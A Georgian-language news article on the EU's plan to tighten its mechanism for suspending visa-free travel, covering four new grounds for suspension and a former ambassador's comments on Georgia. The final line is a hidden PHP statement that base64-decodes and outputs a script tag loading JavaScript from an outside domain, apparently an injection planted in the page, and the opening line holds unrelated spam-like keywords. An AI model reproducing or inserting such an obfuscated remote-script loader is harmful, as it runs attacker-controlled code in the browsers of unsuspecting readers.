gorgia
ავერსი jaluzi

ევროკავშირი ვიზალიბერალიზაციის შეჩერების მექანიზმის გამკაცრებას წლის ბოლომდე აპირებს, რის შედეგადაც, ბრიუსელს უვიზო მიმოსვლის შეჩერება გაუმარტივდება. ეს შეეხება 61 ქვეყანას, მათ შორის საქართველოს, მოლდოვასა და უკრაინასაც, ანუ იმ ქვეყნებს, რომლებიც ევროკავშირთან უვიზო მიმოსვლით სარგებლობენ. ინფორმაციას ამის შესახებ "რადიო თავისუფლების" ევროპის ბიუროს ხელმძღვანელი რიკარდ იოზვიაკი ავრცელებს და შესაბამის სტატიასაც აქვეყნებს. როგორც მოსალოდნელია, საკითხის დამტკიცებას მიმდინარე წლის ბოლომდე გეგმავენ.

ცნობისთვის, ევროკავშირმა ვიზალიბერალიზაციის შეჩერების მექანიზმის გამკაცრების წინადადება 2023 წელს წამოაყენა, ევროკავშირის საბჭომ, რომელიც 27 სახელმწიფოს წარმოადგენს, ერთი წლის წინ თავისი პოზიციაც დაამტკიცა ამ საკითხზე, მაგრამ გასული წლის ივნისში ევროპარლამენტის არჩევნების გამო, ამ საკითხზე მუშაობა შენელდა, ახლა კი, კვლავ განახლდა. როგორც რიკადრ იოზვიაკის სტატიაშია აღნიშნული, ევროპარლამენტმა ახლახან მიიღო საკითხზე მოლაპარაკებების მანდატი.

აღნიშნულ ინიციატივაზე ევროკავშირის სამ ინსტიტუტს შორის პირველი დიალოგი გასულ კვირას გაიმართა. მიზანი პოლონეთის ევროკავშირის თავმჯდომარეობის პერიოდის ამოწურვამდე, ანუ ივნისის ბოლომდე შეთანხმების მიღწევაა. "თუ ყველაფერი კარგად წარიმართა, ახალი კანონმდებლობა ადრეულ შემოდგომაზე ამოქმედდება", - წერს რიკარდ იოზვიაკი.

რა იცვლება?

ვიზალიბერალიზაციის ამ დრომდე მოქმედი მექანიზმის თანახმად, რომელიც 2018 წლიდან ამოქმედდა, მესამე ქვეყნებს ევროკავშირთან უვიზო მიმოსვლა შეუჩერდებათ იმ შემთხვევაში, თუ ამ ქვეყნების მოქალაქეების მხრიდან უვიზო რეჟიმით გათვალისწინებული 90-დღიან ლიმიტის დარღვევების დიდი რაოდენობა ფიქსირდება ან კიდევ ევროკავშირის ქვეყნებში თავშესაფრის მოთხოვნის მიზნით, უვიზო მიმოსვლის ბოროტად გამოყენების შემთხვევები დიდია. ამ დრომდე ევროკავშირს ვიზალიბერალიზაცია შეჩერებული აქვს მხოლოდ ვანუატუსთვის. თავდაპირველად დროებით შეუჩერეს, ხოლო შემდეგ, სამუდამოდ.

გეგმების მიხედვით კი, უვიზო რეჟიმის შეჩერების საფუძვლად დამატებითი ოთხი ფაქტორი გაჩნდება. პირველი - ვიზალიბერალიზაცია შეიძლება შეჩერდეს, თუ უვიზო რეჟიმით მოსარგებლე მესამე ქვეყანასა და ევროკავშირის ზოგად სავიზო პოლიტიკას შორის შეუსაბამობა შეინიშნება.

ასე იყო 2022 წელს, მაგალითად, როდესაც სერბეთმა დაუშვა უვიზო მიმოსვლა ისეთი ქვეყნების მოქალაქეებისთვის, როგორიცაა ბურუნდი, ინდოეთი და კუბა. ბრიუსელი ვარაუდობდა, რომ ამ აღნიშნული ქვეყნების მოქალაქეებიდან ბევრი იყენებდა სერბეთს, როგორც კარს ევროკავშირში შესასვლელად. ევროკომისიის ზეწოლის შემდეგ, ბელგრადმა უარი თქვა ამ შეთანხმებებზე. თუმცა, ევროკავშირის ვიზალიბერალიზაციის შეჩერების არსებული მექანიზმის მიხედვით, შეიძლებოდა სერბეთის მიმართ უფრო მკაცრი გადაწყვეტილებაც მიეღოთ.

დამატებით მეორე მიზეზი, რის გამოც შეიძლება ვიზალიბერალიზაცია შეჩერდეს, არის ე.წ. ჰიბრიდული საფრთხეები. უვიზო რეჟიმის შეჩერების მიზეზებს შორის აღნიშნული ფაქტორის დამატება რუსეთისა და ბელარუსიდან წამოსული საფრთხეების გამოცდილებაზე დაფუძნებით გადაწყდა, კერძოდ, ამ ორმა ქვეყანამ ევროკავშირი აფრიკიდან და აზიიდან ევროკავშირის სასაზღვრო ქვეყნებში მიგრანტების ტრანსპორტირებაში დაადანაშაულა. თუ სხვა მესამე ქვეყანა მსგავს ტაქტიკას გამოიყენებს, ახალი მექანიზმით უვიზო რეჟიმის შეჩერების საფუძველი შეიძლება გახდეს.

მესამე - თუ მესამე ქვეყანას, რომელიც ვიზალიბერალიზაციით სარგებლობს, აქვს "მოქალაქეობის ინვესტიციით მიღების სქემები", რითაც სხვა ქვეყნის მოქალაქეებს აძლევს საშუალებას იყიდონ ამ ქვეყნის მოქალაქეობა - ამანაც შეიძლება ევროკავშირთან უვიზო მიმოსვლის შეჩერება გამოიწვიოს.

თუმცა, შეჩერების მეოთხე ახალი საფუძველი, ალბათ, ყველაზე საინტერესოა, რადგან ის ეხება ევროკავშირის პოლიტიკურ ურთიერთობებს მესამე ქვეყნებთან. ევროკავშირის მიერ მომზადებულ კანონპროექტში ნათქვამია, რომ შეჩერების მექანიზმი შეიძლება ამოქმედდეს „ადამიანის უფლებების სერიოზული დარღვევის“ ან „საერთაშორისო სამართლისა და სტანდარტების სერიოზული დარღვევის, მათ შორის ადამიანის უფლებათა კანონმდებლობისა და საერთაშორისო სასამართლოს გადაწყვეტილებების დარღვევებისა და გადაწყვეტილებების შეუსრულებლობის შემთხვევაში“.

აღნიშნულს ეხმაურება გერმანიაში საქართველოს ყოფილი ელჩი ელგუჯა ხოკრიშვილი, რომელიც წერს, რომ მე-4 პუნქტი განსაკუთრებით მნიშვნელოვანია საქართველოსთვის.

"რას ნიშნავს ეს საქართველოსთვის: ევროკავშირმა უკვე შეაჩერა უვიზო რეჟიმი ქართველი დიპლომატიური პასპორტების მფლობელებისთვის დემოკრატიული უკუსვლის გამო. ეს იყო გაფრთხილება.როდესაც რეჟიმი ამტკიცებს, რომ მათ უსამართლოდ ებრძვიან "გლობალური ომის პარტიები" ან უცხოპლანეტელები, უნდა გვახსოვდეს: ეს წესები თანაბრად ვრცელდება ყველა 61 უვიზო ქვეყანაზე. საქმე ეხება მკაფიო და თანმიმდევრული დემოკრატიული სტანდარტების დაცვას.

ოცნების ბოლოდროინდელი ქმედებები - მედიის თავისუფლების შეზღუდვა, "უცხოელი აგენტების" კანონის მიღება და სასამართლო დამოუკიდებლობის შეზღუდვა და ა.შ. - სწორედ ის დემოკრატიული უკუსვლაა, რაც სრულიად სავიზო შეჩერებას გამოიწვევს. თუ ქვეყანა შორდება ევროპულ ღირებულებებს და სტანდარტებს, ის კარგავს უვიზო მიმოსვლას. ეს იქნება ამ რეჟიმის და მისი მსახურების პირადი პასუხისმგებლობა, რომლებიც ძალაუფლების და პირადი კეთილდღეობის შენარჩუნების მიზნით მზად არიან რისკის ქვეშ დააყენონ ქვეყნის ევროპული მომავალი და განვითარება. ამიტომ არის მნიშვნელოვანი ამ რეჟიმის შეცვლა და ქვეყნის ევროპული განვითარების გზაზე დაბრუნება", - აცხადებს ხოკრიშვილი.

ცნობისთვის, ევროკავშირს ამჟამად უვიზო რეჟიმი აქვს 61 ქვეყანასთან, მათ შორის საქართველოსთან. ამ ქვეყნების მოქალაქეებს შეუძლიათ, უვიზოდ იმოგზაურონ შენგენის ზონაში 90 დღით, 180 დღის განმავლობაში. საქართველომ ევროკავშირთან ვიზალიბერალიზაციას 2017 წლის მარტში მიაღწია.

128
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");